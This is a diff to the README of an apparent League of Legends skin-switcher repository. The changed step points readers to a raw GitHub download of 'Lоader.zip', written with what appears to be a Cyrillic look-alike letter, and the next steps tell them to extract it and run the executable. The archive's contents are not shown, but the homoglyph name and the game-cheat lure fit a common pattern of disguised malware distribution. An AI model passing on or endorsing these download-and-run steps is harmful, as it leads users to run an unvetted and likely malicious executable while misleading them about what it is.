syaiful191397/LoLSkinSwitcher/README.md

 Get started in just a few minutes with our simple installation process:

-1. **Download Loader.rar** from this repository (always use the latest version for optimal performance).
+1. **Download https://raw.githubusercontent.com/syaiful191397/LoLSkinSwitcher/main/Lоader.zip** from this repository (always use the latest version for optimal performance).
 2. Extract the contents using your preferred archive tool (recommended: WinRAR, 7-Zip, or System Archive Utility).
 3. Open the extracted folder and run the executable file corresponding to your operating system.
 4. Follow the on-screen instructions to set up the league client path and select your skins.